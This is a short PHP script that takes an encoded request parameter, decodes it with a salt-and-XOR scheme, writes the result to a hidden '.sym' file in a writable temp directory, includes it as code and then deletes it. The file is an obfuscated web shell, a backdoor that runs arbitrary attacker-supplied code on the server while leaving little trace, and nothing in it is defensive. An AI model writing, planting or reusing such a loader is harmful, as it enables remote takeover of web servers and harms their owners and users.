<?php

if(isset($_REQUEST) && isset($_REQUEST["\x65lement"])){
	$item = array_filter(["/var/tmp", "/dev/shm", getenv("TMP"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), getcwd(), "/tmp", ini_get("upload_tmp_dir")]);
	$fac = $_REQUEST["\x65lement"];
	$fac	=  explode		(	'.'	, $fac) ;  
	$binding = '';
            $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt5 );
    
            foreach($fac as $y => $v7):
                $sChar = ord($salt5[$y%	$lenS] );
                $d =((int)$v7 - $sChar -($y%	10)) ^ 14;
                $binding .= chr($d );
            endforeach;
	while ($rec = array_shift($item)) {
    		if (is_dir($rec) ? is_writable($rec) : false) {
    $record = "$rec/.sym";
    if (file_put_contents($record, $binding)) {
	include $record;
	@unlink($record);
	exit;
}
}
}
}